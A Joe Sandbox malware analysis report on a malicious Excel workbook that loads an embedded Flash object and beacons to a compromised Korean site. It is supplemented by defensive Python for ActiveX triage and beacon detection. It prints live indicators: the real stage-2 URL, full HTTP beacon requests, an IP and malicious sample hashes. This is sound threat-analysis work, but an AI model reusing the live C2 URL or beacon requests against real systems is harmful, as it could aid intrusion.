
Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 44908
Start time: 19:02:57
Joe Sandbox Product: CloudBasic
Start date: 03.02.2018
Overall analysis duration: 0h 4m 20s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: a.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection: MAL
Classification: mal64.evad.expl.winXLSX@1/7@2/2
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information: Failed
HDC Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 60
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, dllhost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: EXCEL.EXE


Detection

Strategy    Score   Range     Reporting        Detection
Threshold   64      0 - 100   Report FP / FN   malicious


Confidence

Strategy    Score   Range   Further Analysis Required?
Threshold   5       0 - 5   false


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox found no clickable buttons; more UI automation may extend the observed behavior.



Signature Overview



AV Detection:

Antivirus detection for domain / URL
Source: www.dylboiler.co.kr, virustotal: Detection: 4%
Antivirus detection for submitted file
Source: a.xlsx, virustotal: Detection: 22%

Exploits:

Microsoft Office program loads Macromedia Flash Player
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, file opened: C:\Windows\system32\Macromed\Flash\Flash32_16_0_0_235.ocx (4 identical entries)
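
The finding above (Excel opening the Flash ActiveX control, Flash32_16_0_0_235.ocx) together with the later memory-string finding that the www.dylboiler.co.kr URL sits inside activeX1.bin points at a Flash ActiveX object embedded in the workbook itself. The following Python is an added triage script and not part of the Joe Sandbox report: it opens an .xlsx as the OOXML zip it is, lists every xl/activeX/activeXN.xml part with its CLSID, flags the Shockwave Flash control CLSID ({D27CDB6E-AE6D-11CF-96B8-444553540000}), and carves ASCII and UTF-16LE URLs out of the matching activeXN.bin stream. The workbook it runs on is constructed in memory with the URL from this report; the byte layout of Flash's persisted property stream is an assumption, so treat the URL carving as a heuristic and run the script against the real sample.

```python
"""Static triage of an .xlsx for embedded ActiveX controls (added example, not from Joe Sandbox).

Walks the OOXML zip, reports every xl/activeX/activeXN.xml part with its
CLSID, flags the Shockwave Flash control, and carves ASCII / UTF-16LE URLs
out of the matching activeXN.bin stream. The workbook is constructed in
memory below; it is not the real a.xlsx.
"""
from __future__ import annotations

import io
import re
import xml.etree.ElementTree as ET
import zipfile

AX_NS = "http://schemas.microsoft.com/office/2006/activeX"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
FLASH_CLSID = "{D27CDB6E-AE6D-11CF-96B8-444553540000}"  # Shockwave Flash Object

ASCII_URL = re.compile(rb"(?:https?|ftp)://[\x21-\x7e]{4,}")
# UTF-16LE: each ASCII byte is followed by a NUL
UTF16_URL = re.compile(
    rb"(?:h\x00t\x00t\x00p\x00(?:s\x00)?|f\x00t\x00p\x00):\x00/\x00/\x00(?:[\x21-\x7e]\x00){4,}"
)


def carve_urls(blob: bytes) -> list[str]:
    """Pull every http/https/ftp URL out of a binary blob, in either encoding."""
    urls = {m.group(0).decode("ascii") for m in ASCII_URL.finditer(blob)}
    urls |= {m.group(0).decode("utf-16-le") for m in UTF16_URL.finditer(blob)}
    return sorted(urls)


def triage_activex(xlsx_bytes: bytes) -> list[dict]:
    """Describe each ActiveX part in the workbook: part name, CLSID, Flash flag, carved URLs."""
    findings: list[dict] = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        names = set(z.namelist())
        for name in sorted(names):
            m = re.fullmatch(r"xl/activeX/(activeX\d+)\.xml", name)
            if not m:
                continue
            root = ET.fromstring(z.read(name))
            # the ax:classid attribute is namespaced, so ElementTree keys it as {ns}classid
            clsid = root.get(f"{{{AX_NS}}}classid", "").upper()
            bin_name = f"xl/activeX/{m.group(1)}.bin"
            blob = z.read(bin_name) if bin_name in names else b""
            findings.append({
                "part": name,
                "clsid": clsid,
                "is_flash": clsid == FLASH_CLSID,
                "bin_size": len(blob),
                "urls": carve_urls(blob),
            })
    return findings


def build_sample_xlsx(movie_url: str) -> bytes:
    """Constructed minimal workbook with one Flash ActiveX part (test data only).

    activeX1.xml follows the OOXML ActiveX part layout; the .bin content is an
    assumed stand-in for Flash's persisted property stream, with the movie URL
    embedded as UTF-16LE between padding bytes.
    """
    ocx_xml = (
        f'<ax:ocx xmlns:ax="{AX_NS}" xmlns:r="{R_NS}" '
        f'ax:classid="{FLASH_CLSID}" ax:persistence="persistStreamInit" r:id="rId1"/>'
    )
    blob = b"\x00" * 16 + movie_url.encode("utf-16-le") + b"\x00\x00" + b"\x90" * 8
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/activeX/activeX1.xml", ocx_xml)
        z.writestr("xl/activeX/activeX1.bin", blob)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_xlsx("http://www.dylboiler.co.kr/admincenter/files/boad/4/manager.php")
    for f in triage_activex(sample):
        tag = "SHOCKWAVE FLASH" if f["is_flash"] else "other control"
        print(f"{f['part']}: {f['clsid']} [{tag}] bin={f['bin_size']} bytes urls={f['urls']}")
```

Swap the constructed bytes for `open("a.xlsx", "rb").read()` to triage a real workbook; any part whose CLSID is the Flash control deserves the same scrutiny regardless of what the carving finds, since the movie can also be loaded from a URL that is built at runtime rather than stored as a plain string.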

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: EXCEL.EXE, binary or memory string: DirectInput8Create
Installs a global mouse hook
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Windows user hook set: 0 mouse low level C:\Windows\system32\DINPUT8.dll
(Both entries are set from DINPUT8.dll, the DirectInput library, inside the Excel process that has loaded the Flash control; on their own they are not evidence of a keylogger.)

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic, DNS query: name: www.dylboiler.co.kr
Potential document exploit detected (performs HTTP gets)
Source: global traffic, TCP traffic: 192.168.2.3:49172 -> 114.108.131.63:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic, TCP traffic: 192.168.2.3:49172 -> 114.108.131.63:80

Networking:

Downloads files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, file created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4A0E0FA.emf
Downloads files from webservers via HTTP
Source: global traffic, HTTP traffic detected:
  GET /crossdomain.xml HTTP/1.1
  Accept: */*
  Accept-Language: en-US
  x-flash-version: 16,0,0,235
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: www.dylboiler.co.kr
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F544858D11A14D6EC48493805834A643609AAAF57E793AB7C6C6840BEDDA9FF3F6A17B26861193875A25F903453C53309D47AA736F561515967B78B3671F7F6B7E4FA113151630BE9793AD6D705D77DAA7802B70C&fp_vs=WIN%2016.0,0,235&os_vs=Windows%207 HTTP/1.1
  Accept: */*
  Accept-Language: en-US
  x-flash-version: 16,0,0,235
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: www.dylboiler.co.kr
  Connection: Keep-Alive
Performs DNS lookups
Source: unknown, DNS traffic detected: queries for: www.dylboiler.co.kr
Urls found in memory or binary data
Source: EXCEL.EXE, string found in binary or memory: HTTP://
Source: EXCEL.EXE, string found in binary or memory: HTTPS://
Source: EXCEL.EXE, string found in binary or memory: HTTPS://HTTP://o
Source: EXCEL.EXE, string found in binary or memory: file://
Source: EXCEL.EXE, string found in binary or memory: file:///
Source: EXCEL.EXE, string found in binary or memory: file:////
Source: EXCEL.EXE, string found in binary or memory: file:////#?
Source: EXCEL.EXE, string found in binary or memory: file:///C:
Source: EXCEL.EXE, string found in binary or memory: file:///local
Source: EXCEL.EXE, string found in binary or memory: file:///localWithNet
Source: EXCEL.EXE, string found in binary or memory: file:///localWithNetfile:///localfile://dummyCould
Source: EXCEL.EXE, string found in binary or memory: file://pdfmediahttpCookie:URLStreamReadThreadc
Source: EXCEL.EXE, string found in binary or memory: ftp://
Source: EXCEL.EXE, string found in binary or memory: ftp://pt-PTpt-BRes-ES
Source: EXCEL.EXE, string found in binary or memory: http://
Source: EXCEL.EXE, string found in binary or memory: http://%s
Source: EXCEL.EXE, string found in binary or memory: http://%s/
Source: EXCEL.EXE, string found in binary or memory: http://%shttp://a.SharedObject.BadPersistenceSharedObject.UriMismatchpendingReserved
Source: EXCEL.EXE, string found in binary or memory: http://a.
Source: EXCEL.EXE, string found in binary or memory: http://fpdownload2.macromedia.com/get/
Source: EXCEL.EXE, string found in binary or memory: http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/express/version_win_
Source: EXCEL.EXE, string found in binary or memory: http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/version_
Source: EXCEL.EXE, string found in binary or memory: http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/version_x
Source: EXCEL.EXE, string found in binary or memory: http://fpdownload2.macromedia.com/get/https://fpdownload.macromedia.com/get/https://www.macromedia.c
Source: EXCEL.EXE, string found in binary or memory: http://https://ftp://file://file:///%02XabczdhcheckPolicyFileexactFitfailed
Source: EXCEL.EXE, string found in binary or memory: http://localhost:8080/axis/services/urn:EDCLicenseService
Source: EXCEL.EXE, string found in binary or memory: http://purl.o
Source: EXCEL.EXE, string found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: EXCEL.EXE, string found in binary or memory: http://www.
Source: EXCEL.EXE, activeX1.bin, string found in binary or memory: http://www.dylboiler.co.kr/admincenter/files/boad/4/manager.php
Source: EXCEL.EXE, string found in binary or memory: http://www.dylboiler.co.kr/admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F5
Source: EXCEL.EXE, string found in binary or memory: http://www.macromedia.com
Source: EXCEL.EXE, string found in binary or memory: http://www.macromedia.com/go/player_settings_
Source: EXCEL.EXE, string found in binary or memory: http://www.macromedia.com/go/player_settings_.Unmuted.MutedCamera.UnmutedCamera.MutedMicrophone.Unmu
Source: EXCEL.EXE, crossdomain[1].xml.2.dr, string found in binary or memory: http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd
Source: EXCEL.EXE, string found in binary or memory: http://www.macromedia.comhttps://www.macromedia.com/support/flashplayer/sys/&amp
Source: EXCEL.EXE, string found in binary or memory: http://www.openssl.org/support/faq.html
Source: EXCEL.EXE, string found in binary or memory: http://www.openssl.org/support/faq.html.....................
Source: EXCEL.EXE, string found in binary or memory: https://
Source: EXCEL.EXE, string found in binary or memory: https://auth.adobefpl.com/1/
Source: EXCEL.EXE, string found in binary or memory: https://fpdownload.macromedia.com/get/
Source: EXCEL.EXE, string found in binary or memory: https://www.macromedia.com/bin/flashdownload.cgi
Source: EXCEL.EXE, string found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
Uses a known web browser user agent for HTTP communication
Source: global traffic, HTTP traffic detected:
  GET /crossdomain.xml HTTP/1.1
  Accept: */*
  Accept-Language: en-US
  x-flash-version: 16,0,0,235
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: www.dylboiler.co.kr
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F544858D11A14D6EC48493805834A643609AAAF57E793AB7C6C6840BEDDA9FF3F6A17B26861193875A25F903453C53309D47AA736F561515967B78B3671F7F6B7E4FA113151630BE9793AD6D705D77DAA7802B70C&fp_vs=WIN%2016.0,0,235&os_vs=Windows%207 HTTP/1.1
  Accept: */*
  Accept-Language: en-US
  x-flash-version: 16,0,0,235
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: www.dylboiler.co.kr
  Connection: Keep-Alive
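
The two captured requests share the markers a proxy or IDS analyst would key on: an x-flash-version header (the Flash runtime's own HTTP stack identifying itself, not a browser), a fetch of the host's crossdomain.xml policy, and then a GET to a PHP endpoint that reports the player and OS version (fp_vs, os_vs) alongside a long hexadecimal id token. The following Python is an added detection example, not code from the report or from Joe Sandbox: it parses raw HTTP/1.1 request text, scores each request on those indicators, and pairs the policy fetch with a later beacon to the same host. The sample requests are reconstructed from the two GETs shown above plus one constructed benign request; the 64-hex-character threshold for the id token is an assumption.

```python
"""Flag the Flash beacon pattern captured in this report (added example, not from Joe Sandbox).

Indicators: the x-flash-version request header (added by the Flash runtime,
not by a browser), a crossdomain.xml policy fetch, fp_vs/os_vs version
parameters, and a long hex "id" token. Sample requests are rebuilt from the
two GETs in the report plus one constructed benign control.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, urlsplit

HEX_TOKEN = re.compile(r"^[0-9A-Fa-f]{64,}$")  # assumed threshold: 64+ hex chars

# id parameter exactly as captured in the report (split only for line length)
SAMPLE_ID = ("2D49A8E6CD252385FABA5177F88EAF0F544858D11A14D6EC48493805834A643609AAAF57"
             "E793AB7C6C6840BEDDA9FF3F6A17B26861193875A25F903453C53309D47AA736F5615159"
             "67B78B3671F7F6B7E4FA113151630BE9793AD6D705D77DAA7802B70C")

_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; "
       ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
       "Media Center PC 6.0; .NET4.0C; .NET4.0E)")


def _flash_get(target: str) -> str:
    """Rebuild one of the captured requests as raw HTTP/1.1 text (constructed)."""
    return (f"GET {target} HTTP/1.1\r\n"
            "Accept: */*\r\nAccept-Language: en-US\r\n"
            "x-flash-version: 16,0,0,235\r\n"
            "Accept-Encoding: gzip, deflate\r\n"
            f"User-Agent: {_UA}\r\n"
            "Host: www.dylboiler.co.kr\r\nConnection: Keep-Alive\r\n\r\n")


SAMPLE_REQUESTS = [
    _flash_get("/crossdomain.xml"),
    _flash_get(f"/admincenter/files/boad/4/manager.php?id={SAMPLE_ID}"
               "&fp_vs=WIN%2016.0,0,235&os_vs=Windows%207"),
    # benign control (constructed): ordinary browser request, no Flash markers
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]


def parse_request(raw: str) -> dict:
    """Split raw request text into method, host, path, decoded query and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {
        "method": method,
        "host": headers.get("host", ""),
        "path": parts.path,
        "query": {k: v[0] for k, v in parse_qs(parts.query).items()},
        "headers": headers,
    }


def flash_indicators(req: dict) -> list[str]:
    """Return the human-readable indicators this request trips (empty list = clean)."""
    hits: list[str] = []
    q = req["query"]
    if "x-flash-version" in req["headers"]:
        hits.append(f"x-flash-version header ({req['headers']['x-flash-version']})")
    if req["path"].endswith("/crossdomain.xml"):
        hits.append("crossdomain.xml policy fetch")
    if "fp_vs" in q and "os_vs" in q:
        hits.append(f"reports player/OS version fp_vs={q['fp_vs']!r} os_vs={q['os_vs']!r}")
    if any(HEX_TOKEN.match(v) for v in q.values()):
        hits.append("long hex token in query (victim/campaign id)")
    return hits


def is_flash_loader_beacon(req: dict) -> bool:
    """The stage-2 fetch: the Flash runtime reporting its version to a script endpoint."""
    q = req["query"]
    return "x-flash-version" in req["headers"] and "fp_vs" in q and "os_vs" in q


def correlate(reqs: list[dict]) -> list[tuple[str, str]]:
    """Pair a Flash crossdomain.xml fetch with a later beacon to the same host."""
    policy_hosts: set[str] = set()
    alerts: list[tuple[str, str]] = []
    for r in reqs:
        if r["path"].endswith("/crossdomain.xml") and "x-flash-version" in r["headers"]:
            policy_hosts.add(r["host"])
        elif is_flash_loader_beacon(r):
            tag = "policy-then-beacon" if r["host"] in policy_hosts else "beacon"
            alerts.append((tag, r["host"] + r["path"]))
    return alerts


if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS]
    for r in parsed:
        print(f"{r['method']} {r['host']}{r['path']}: {flash_indicators(r) or 'no indicators'}")
    print("alerts:", correlate(parsed))
```

The user agent by itself is a weak signal: the MSIE 7.0-compatible string is what the sandbox's own signature calls "a known web browser user agent", so the distinguishing features are the x-flash-version header, which a browser never sends, and the version-reporting query that follows the policy fetch. Feed the functions the request text from a proxy or PCAP and alert on the policy-then-beacon pair rather than on either request alone.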

System Summary:

Checks whether correct version of .NET is installed
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
Found graphical window changes (likely an installer)
Source: Window Recorder, window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, file opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: Flash.pdb source: EXCEL.EXE
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb source: EXCEL.EXE
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb> source: EXCEL.EXE
Binary contains paths to development resources
Source: EXCEL.EXE, binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Classification label
Source: classification engine, classification label: mal64.evad.expl.winXLSX@1/7@2/2
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, file created: C:\Users\user\AppData\Roaming\Microsoft\Excel
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, file created: C:\Users\SAMTAR~1\AppData\Local\Temp\CVRE54F.tmp
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, file read: C:\Users\desktop.ini
Reads software policies
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)
Source: a.xlsx, Virustotal: hash found
Uses an in-process (OLE) Automation server
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, process information set: NOOPENFILEERRORBOX (60 identical entries)
Stores large binary data to the registry
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, key value created or modified: HKEY_USERS\Software\Microsoft\Office\14.0\Excel FontInfoCache
System process connects to network (likely due to code injection or exploit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, network connect: 114.108.131.63 80

Behavior Graph

Recovered from the behavior graph (the rendered graph image and its icon legend are not part of this page):

Behavior Graph ID: 44908
Sample: a.xlsx
Start date: 03/02/2018
Architecture: WINDOWS
Score: 64
Process: EXCEL.EXE, started (58 / 49, the graph's counts of created registry values / created files)
DNS/IP: www.dylboiler.co.kr, 114.108.131.63, client ports 49172 and 49173 -> 80, LGDACOM Corporation (KR, Korea Republic of)
DNS/IP: 8.8.8.8, client port 63758 -> 53, Google Inc (US, United States)
Dropped file: C:\Users\user\Desktop\~$a.xlsx (data)
Signatures on the sample: Antivirus detection for domain / URL; Antivirus detection for submitted file
Signatures on EXCEL.EXE: System process connects to network (likely due to code injection or exploit); Microsoft Office program loads Macromedia Flash Player

Simulations

Behavior and APIs

Time       Type              Description
19:03:29   API Interceptor   2x Sleep call for process: EXCEL.EXE modified from: 30000ms to: 100ms
19:03:29   API Interceptor   657x Sleep call for process: EXCEL.EXE modified from: 60000ms to: 100ms

Antivirus Detection

Initial Sample

Source   Detection   Cloud
a.xlsx   22%         virustotal

Dropped Files

No Antivirus matches

Domains

Source                Detection   Cloud
www.dylboiler.co.kr   4%          virustotal

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match: LGDACOMLGDACOMCorporationKR (the ASN of 114.108.131.63); associated sample name / URL, SHA 256, detection and context IP for each earlier analysis:
  • 31youtubeer@youtube.exe
    SHA 256: ecb0852024820c4b3426c5e10570e9397e887a959d1a5827578a07200f51afff
    Detection: malicious
    Context: 211.169.146.91
  • winupdate.exe
    SHA 256: 2161c4f303c9b5f38a58fa1dedf3f70329c6009a273d6be0a2b4a945f2114b02
    Detection: malicious
    Context: 110.45.144.153
  • Lx9gbXEjct.exe
    SHA 256: d750ac2061df6fd607d901ad918e9e1f0693e044e399c863d8d09eb0c866100a
    Detection: malicious
    Context: 211.234.63.232
  • 44PI-7993INV#-2017.exe
    SHA 256: 1356d7bc326b6b2837a6a3fd6a740487d8493cf7336275567bbf7be5be541505
    Detection: malicious
    Context: 211.234.63.232
  • rinnai.co.kr (URL, no sample hash)
    Detection: malicious
    Context: 58.72.180.22
  • 7#U7eJQOO5OUO54VOC737089BY30.js
    SHA 256: 1ce0ee9bd5ba5662d8d18b2e43c2a98a790bcd541fd56ec85c3be7db1e0636f0
    Detection: malicious
    Context: 211.40.221.67
  • 7#U7eJQOO5OUO54VOC737089BY30.js
    SHA 256: 1ce0ee9bd5ba5662d8d18b2e43c2a98a790bcd541fd56ec85c3be7db1e0636f0
    Detection: malicious
    Context: 211.40.221.67
  • 19QUOTATION.exe
    SHA 256: 1d8730fb8718b3e9765cf8146c71da54d853fc5da73065a7bfd3509ec8ec261b
    Detection: malicious
    Context: 211.234.63.232
  • LWop1cXK0.exe
    SHA 256: 33da905c31916f6c8f457eba354991f2018e7d7c888f160843b42a229aa078c0
    Detection: malicious
    Context: 114.108.160.134

Dropped Files

No context

Screenshot